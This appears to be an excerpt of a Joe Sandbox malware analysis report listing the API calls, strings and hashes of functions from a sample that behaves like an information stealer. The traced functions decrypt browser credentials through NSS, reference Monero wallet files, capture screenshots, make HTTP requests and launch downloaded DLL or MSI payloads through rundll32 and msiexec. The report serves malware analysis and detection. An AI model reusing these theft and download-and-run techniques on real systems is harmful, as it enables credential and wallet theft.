Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf4832018ce800971d164472ec2f4f05aab15948fb22975bed3726cf3d32f943
Instruction ID: 8148f4863d3cfc672f457295bedb643859670c0c39a4079392a4191df4b2751a
Opcode Fuzzy Hash: bf4832018ce800971d164472ec2f4f05aab15948fb22975bed3726cf3d32f943
Instruction Fuzzy Hash: A93178F250C604EFE70DBF29D85263ABBE5FB94350F12892EE9C686250EA391451CB47

Function 006A9750 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90

Function 0069C990 Relevance: 28.4, APIs: 15, Strings: 1, Instructions: 384filestringCOMMON

Download Yara Rule

APIs

NSS_Init.NSS3(00000000), ref: 0069C9A5

Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788

Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
Part of subcall function 006AA920: lstrcat.KERNEL32(00000000), ref: 006AA982

Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905

Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,01359078,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0135D1B8,00000000,?,006B144C,00000000,?,?), ref: 0069CA6C
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0069CA89
GetFileSize.KERNEL32(00000000,00000000), ref: 0069CA95
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0069CAA8
ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0069CAD9
StrStrA.SHLWAPI(?,0135D2A8,006B0B52), ref: 0069CAF7
StrStrA.SHLWAPI(00000000,0135D1D0), ref: 0069CB1E
StrStrA.SHLWAPI(?,0135DA40,00000000,?,006B1458,00000000,?,00000000,00000000,?,013591F8,00000000,?,006B1454,00000000,?), ref: 0069CCA2
StrStrA.SHLWAPI(00000000,0135DA00), ref: 0069CCB9

Part of subcall function 0069C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0069C871
Part of subcall function 0069C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0069C87C
Part of subcall function 0069C820: PK11_GetInternalKeySlot.NSS3 ref: 0069C88A
Part of subcall function 0069C820: PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 0069C8A5
Part of subcall function 0069C820: PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 0069C8EB
Part of subcall function 0069C820: PK11_FreeSlot.NSS3(?), ref: 0069C961

StrStrA.SHLWAPI(?,0135DA00,00000000,?,006B145C,00000000,?,00000000,01359298), ref: 0069CD5A
StrStrA.SHLWAPI(00000000,013590D8), ref: 0069CD71

Part of subcall function 0069C820: lstrcat.KERNEL32(?,006B0B46), ref: 0069C943
Part of subcall function 0069C820: lstrcat.KERNEL32(?,006B0B47), ref: 0069C957
Part of subcall function 0069C820: lstrcat.KERNEL32(?,006B0B4E), ref: 0069C978

lstrlen.KERNEL32(00000000), ref: 0069CE44
CloseHandle.KERNEL32(00000000), ref: 0069CE9C
NSS_Shutdown.NSS3 ref: 0069CEAA

Strings

, xrefs: 0069C9C6

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcat$lstrcpy$K11_lstrlen$PointerSlot$AuthenticateBinaryCloseCreateCryptDecryptFreeHandleInitInternalReadShutdownSizeString
String ID:
API String ID: 1052888304-3916222277
Opcode ID: a91db280727c88e1edd9d9580a7d8b48ae04924ef60a390a06d064fb37716ce8
Instruction ID: 915f00d74f2bc172210de8deff52536c73ddd365e23227a5c3ec2bbd8817493e
Opcode Fuzzy Hash: a91db280727c88e1edd9d9580a7d8b48ae04924ef60a390a06d064fb37716ce8
Instruction Fuzzy Hash: EBE1F871911108ABDB88FBE0DC91EEEB77AAF15300F50415EF10666191EF346E4ACF6A

Function 006A9010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 006A906C

Strings

image/jpeg, xrefs: 006A9136

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: CreateGlobalStream
String ID: image/jpeg
API String ID: 2244384528-3785015651
Opcode ID: f171483a6a7da820310304ccc11e2ac3d82af5126ea1d306584490a301bf46f2
Instruction ID: d252a65544ac0f8cf958928352432320c436f6f4f657f158366db5422b8895e7
Opcode Fuzzy Hash: f171483a6a7da820310304ccc11e2ac3d82af5126ea1d306584490a301bf46f2
Instruction Fuzzy Hash: FE71EFB5910208ABDB08EFE4DD89FEEB7B9BF49700F208619F515A7290DB349905CF61

Function 006A17A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,block), ref: 006A17C5
ExitProcess.KERNEL32 ref: 006A17D1

Strings

block, xrefs: 006A17B7

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: block
API String ID: 621844428-2199623458
Opcode ID: 2865072002cfc9816a35e9526f88fd2338de74413ce5129cda4e08b03566ce32
Instruction ID: 75fc569c38b361eb0bf1cd165fb41c18fd105880a27c5e0fa8f380162e70ba38
Opcode Fuzzy Hash: 2865072002cfc9816a35e9526f88fd2338de74413ce5129cda4e08b03566ce32
Instruction Fuzzy Hash: 2A514BB4A00209EFDB14EFA0D964ABF77B6BF46704F104159E806AB290D774ED42DF62

Function 006A2E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON

Download Yara Rule

APIs

Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788

ShellExecuteEx.SHELL32(0000003C), ref: 006A31C5
ShellExecuteEx.SHELL32(0000003C), ref: 006A335D
ShellExecuteEx.SHELL32(0000003C), ref: 006A34EA

Strings

<, xrefs: 006A3490
C:\Windows\system32\msiexec.exe, xrefs: 006A34BF
/passive, xrefs: 006A345B
/i ", xrefs: 006A33E4
.msi, xrefs: 006A3398
"" , xrefs: 006A309A
.dll, xrefs: 006A31E5
C:\Windows\system32\rundll32.exe, xrefs: 006A3332

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: ExecuteShell$lstrcpy
String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
API String ID: 2507796910-3625054190
Opcode ID: d6beea715b484517a796cd2bd49d2497454c2f55800fa4cd850d222ad3eb2af7
Instruction ID: 277d234c00d6db6b5e484594ab40a673fc0bbb239ad60033b4e4f0390cfbfc4c
Opcode Fuzzy Hash: d6beea715b484517a796cd2bd49d2497454c2f55800fa4cd850d222ad3eb2af7
Instruction Fuzzy Hash: 0612ED718101089ADB89FBE0DC92EEEB77AAF15300F50415EF50666192EF346F4ACF5A

Function 006A52C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON

Download Yara Rule

APIs

Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6

Part of subcall function 00696280: InternetOpenA.WININET(006B0DFE,00000001,00000000,00000000,00000000), ref: 006962E1
Part of subcall function 00696280: StrCmpCA.SHLWAPI(?,0135E928), ref: 00696303
Part of subcall function 00696280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00696335
Part of subcall function 00696280: HttpOpenRequestA.WININET(00000000,GET,?,0135E1D0,00000000,00000000,00400100,00000000), ref: 00696385
Part of subcall function 00696280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006963BF
Part of subcall function 00696280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006963D1

Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 006A5318
lstrlen.KERNEL32(00000000), ref: 006A532F

Part of subcall function 006A8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 006A8E52

StrStrA.SHLWAPI(00000000,00000000), ref: 006A5364
lstrlen.KERNEL32(00000000), ref: 006A5383
lstrlen.KERNEL32(00000000), ref: 006A53AE

Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788

Strings

ERROR, xrefs: 006A53B9
ERROR, xrefs: 006A5432
ERROR, xrefs: 006A546F
ERROR, xrefs: 006A530A
ERROR, xrefs: 006A54A9

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
String ID: ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 3240024479-1526165396
Opcode ID: b5e10198b2652a5197e49258c8d8e842880886ea08dc73396d91e40469d0c785
Instruction ID: 171346cc69880385c19ff7904b9654b2d8dc1c48a1a1f76d14b1db49fb809b11
Opcode Fuzzy Hash: b5e10198b2652a5197e49258c8d8e842880886ea08dc73396d91e40469d0c785
Instruction Fuzzy Hash: DB510D709111489BCB98FFA0C992AEE777AAF12301F50401DF9075A591EF346F46CF66

Function 006A12D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

